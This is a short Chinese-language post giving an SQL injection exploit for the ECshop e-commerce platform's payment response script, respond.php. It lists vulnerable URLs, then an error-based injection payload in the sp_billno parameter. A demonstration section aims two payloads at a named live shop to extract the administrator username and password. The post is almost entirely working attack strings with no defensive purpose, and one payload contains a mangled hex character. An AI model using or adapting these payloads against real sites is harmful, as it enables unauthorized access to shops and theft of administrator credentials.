ECshop 支付方式注射

漏洞验证:
respond.php?code=tenpay&attach=voucher&sp_billno=fjhgx
respond.php?code=cncard
respond.php?code=chinabank

EXP:
respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0×27,count(*),0×27,0x7e) FROM `ecs`.ecs_admin_user)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and

演示:

http://www.we17buy.com/respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select user_name from `we17buy`.`ecs_admin_user` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and 1=1

http://www.we17buy.com/respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select password from `we17buy`.`ecs_admin_user` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and 1=1

你可能感兴趣的:(职场,ecshop,休闲,支付方式注射)